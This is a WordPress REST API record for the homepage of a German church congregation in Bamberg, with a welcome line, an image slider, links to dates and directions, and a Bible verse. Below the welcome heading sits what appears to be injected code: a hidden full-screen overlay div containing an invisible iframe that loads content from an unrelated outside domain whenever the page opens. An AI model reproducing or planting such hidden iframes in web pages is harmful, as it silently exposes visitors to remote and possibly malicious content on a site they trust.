{"id":65,"date":"2013-09-14T14:27:54","date_gmt":"2013-09-14T12:27:54","guid":{"rendered":"http:\/\/christen-bamberg.de\/?page_id=65"},"modified":"2025-12-02T16:45:03","modified_gmt":"2025-12-02T15:45:03","slug":"herzlich-willkommen","status":"publish","type":"page","link":"https:\/\/www.christen-bamberg.de\/","title":{"rendered":"Start"},"content":{"rendered":"\n<p><\/p>\n\n\n<div id=\"pl-65\" class=\"panel-layout\">\n<div id=\"pg-65-0\" class=\"panel-grid panel-no-style\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\" data-ratio=\"0.15470053\" data-ratio-direction=\"right\">\n<div id=\"pgc-65-0-0\" class=\"panel-grid-cell\" data-weight=\"1\">\n<div id=\"panel-65-0-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\">\n<div class=\"textwidget\">\n<header class=\"entry-header\">\n<h1 class=\"entry-title\"><div tabindex=\"0\" class=\"cycloneslider cycloneslider-template-standard cycloneslider-width-responsive\" id=\"cycloneslider-slide-1-1\" style=\"max-width:960px\" > <div class=\"cycloneslider-slides cycle-slideshow\" data-cycle-allow-wrap=\"true\" data-cycle-dynamic-height=\"off\" data-cycle-auto-height=\"960:640\" data-cycle-auto-height-easing=\"null\" data-cycle-auto-height-speed=\"250\" data-cycle-delay=\"0\" data-cycle-easing=\"\" data-cycle-fx=\"fade\" data-cycle-hide-non-active=\"true\" data-cycle-log=\"false\" data-cycle-next=\"#cycloneslider-slide-1-1 .cycloneslider-next\" data-cycle-pager=\"#cycloneslider-slide-1-1 .cycloneslider-pager\" data-cycle-pause-on-hover=\"true\" data-cycle-prev=\"#cycloneslider-slide-1-1 .cycloneslider-prev\" data-cycle-slides=\"&gt; div\" data-cycle-speed=\"1000\" data-cycle-swipe=\"1\" data-cycle-tile-count=\"7\" data-cycle-tile-delay=\"100\" data-cycle-tile-vertical=\"true\" data-cycle-timeout=\"4000\" > <div class=\"cycloneslider-slide cycloneslider-slide-image\" > <a class=\"cycloneslider-caption-more\" href=\"https:\/\/christen-bamberg.de\/?page_id=406\"> <img decoding=\"async\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2014\/04\/Wasser_slide-960x640.jpg\" alt=\"\" title=\"\" \/> <\/a> <div class=\"cycloneslider-caption\"> <div class=\"cycloneslider-caption-title\">Das Evangelium<\/div> <div class=\"cycloneslider-caption-description\"><\/div> <\/div> <\/div> <div class=\"cycloneslider-slide cycloneslider-slide-image\" > <a class=\"cycloneslider-caption-more\" href=\"https:\/\/christen-bamberg.de\/?page_id=2\"> <img decoding=\"async\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/figures-4273081_1920-e1635941064146-960x640.jpg\" alt=\"\" title=\"\" \/> <\/a> <div class=\"cycloneslider-caption\"> <div class=\"cycloneslider-caption-title\">\u00dcber uns<\/div> <div class=\"cycloneslider-caption-description\"><\/div> <\/div> <\/div> <\/div> <div class=\"cycloneslider-pager\"><\/div> <a href=\"#\" class=\"cycloneslider-prev\"> <span class=\"arrow\"><\/span> <\/a> <a href=\"#\" class=\"cycloneslider-next\"> <span class=\"arrow\"><\/span> <\/a> <\/div><\/h1>\n<\/header>\n<h3><span style=\"color: #000000;\">Herzlich Willkommen auf der Homepage der Christlichen Gemeinde Bamberg.<\/span><\/h3>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"pg-65-1\" class=\"panel-grid panel-no-style\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\" data-ratio=\"1\" data-ratio-direction=\"right\">\n<div id=\"pgc-65-1-0\" class=\"panel-grid-cell\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;vertical_alignment&quot;:&quot;auto&quot;}\" data-weight=\"0.5\">\n<div id=\"panel-65-1-0-0\" class=\"so-panel widget widget_media_image panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\"><h3 class=\"widget-title\">Unsere Termine<\/h3><a href=\"https:\/\/www.christen-bamberg.de\/?page_id=23\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/time-273857_1920-300x200.jpg\" class=\"image wp-image-2816  attachment-medium size-medium\" alt=\"\" style=\"max-width: 100%; height: auto;\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/time-273857_1920-300x200.jpg 300w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/time-273857_1920-768x512.jpg 768w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/time-273857_1920-1024x683.jpg 1024w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/time-273857_1920-624x416.jpg 624w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/time-273857_1920-272x182.jpg 272w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/09\/time-273857_1920.jpg 1920w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/div>\n<\/div>\n<div id=\"pgc-65-1-1\" class=\"panel-grid-cell\" data-weight=\"0.5\">\n<div id=\"panel-65-1-1-0\" class=\"so-panel widget widget_media_image panel-first-child panel-last-child\" data-index=\"2\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\"><h3 class=\"widget-title\">Wo Sie uns finden<\/h3><a href=\"https:\/\/www.christen-bamberg.de\/?page_id=20\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"171\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2020\/04\/map-1272165_640-300x171.png\" class=\"image wp-image-3009  attachment-medium size-medium\" alt=\"\" style=\"max-width: 100%; height: auto;\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2020\/04\/map-1272165_640-300x171.png 300w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2020\/04\/map-1272165_640-624x355.png 624w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2020\/04\/map-1272165_640.png 640w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-65-2\" class=\"panel-grid panel-no-style\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\" data-ratio=\"0.61803398\" data-ratio-direction=\"right\">\n<div id=\"pgc-65-2-0\" class=\"panel-grid-cell\" data-weight=\"0.618033992092\">\n<div id=\"panel-65-2-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"3\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\">\n<div class=\"textwidget\"><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-65-2-1\" class=\"panel-grid-cell\" data-weight=\"0.381966007908\">\n<div id=\"panel-65-2-1-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"4\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\">\n<div class=\"textwidget\">\n<p style=\"color: #ffff00;\"><span style=\"color: #000000;\">Jesus Christus spricht:<\/span><\/p>\n<p><em><span style=\"color: #333399;\">\u201cKommt her zu mir, alle, die ihr m\u00fchselig und beladen seid; ich will euch erquicken.<\/span><\/em><br \/>\n<em> <span style=\"color: #333399;\"> Nehmt auf euch mein Joch und lernt von mir; denn ich bin sanftm\u00fctig und von <\/span><\/em><br \/>\n<em> <span style=\"color: #333399;\"> Herzen dem\u00fctig; so werdet ihr Ruhe f\u00fcr eure Seelen finden. Denn mein Joch ist sanft, und meine Last ist leicht\u201d.<\/span><\/em><\/p>\n<p><span style=\"color: #000000;\">Matth\u00e4usevangelium, 11,28-30<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Herzlich Willkommen auf der Homepage der Christlichen Gemeinde Bamberg. Jesus Christus spricht: \u201cKommt her zu mir, alle, die ihr m\u00fchselig und beladen seid; ich will euch erquicken. Nehmt auf euch mein Joch und lernt von mir; denn ich bin sanftm\u00fctig und von Herzen dem\u00fctig; so werdet ihr Ruhe f\u00fcr eure Seelen finden. Denn mein Joch [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/front-page.php","meta":{"footnotes":""},"class_list":["post-65","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages\/65","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=65"}],"version-history":[{"count":110,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages\/65\/revisions"}],"predecessor-version":[{"id":29277,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages\/65\/revisions\/29277"}],"wp:attachment":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}